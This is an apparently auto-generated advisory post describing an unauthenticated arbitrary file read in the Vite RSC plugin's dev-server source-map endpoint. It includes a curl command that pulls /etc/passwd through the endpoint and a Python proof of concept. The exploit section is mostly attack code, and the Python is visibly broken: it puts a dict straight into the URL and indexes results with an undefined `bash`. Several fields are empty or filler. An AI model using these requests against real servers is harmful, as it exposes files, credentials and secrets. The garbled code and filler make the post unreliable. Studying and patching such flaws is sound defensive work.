Listen to this Post
The vulnerability exists in the `/__vite_rsc_findSourceMapURL` endpoint of the Vite RSC plugin. During development mode (vite dev), this endpoint accepts a user-controlled `filename` query parameter. If the provided filename string begins with file://, it is converted to a filesystem path using fileURLToPath(). The code then checks if the file exists with `fs.existsSync()` and, without any path traversal or directory validation, reads its entire contents synchronously via fs.readFileSync(filename, 'utf-8'). The file’s content is embedded into a JSON response object within the `sourcesContent` array, which is then returned to the unauthenticated attacker. This allows reading any file accessible to the Node.js process.
Platform: @vitejs/plugin-rsc
Version: latest/unpatched
Vulnerability: Arbitrary file read
Severity: High
date:
Prediction: Patch expected soon
What Undercode Say:
curl 'http://localhost:5173/__vite_rsc_findSourceMapURL?filename=file:///etc/passwd&environmentName=Server'
import urllib.request
import json
url = f"http://{host}:{port}/__vite_rsc_findSourceMapURL"
params = {'filename': f'file://{file_path}', 'environmentName': 'Server'}
response = urllib.request.urlopen(f"{url}?{params}")
data = json.loads(response.read())
print(data['sourcesContent'][bash])
How Exploit:
Network-exposed dev servers
XSS chained attacks
Malicious local packages
Protection from this CVE:
Restrict dev server exposure
Validate file paths
Disable plugin development
Impact:
Leaks environment variables
Exposes secrets/credentials
Compromises source code
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

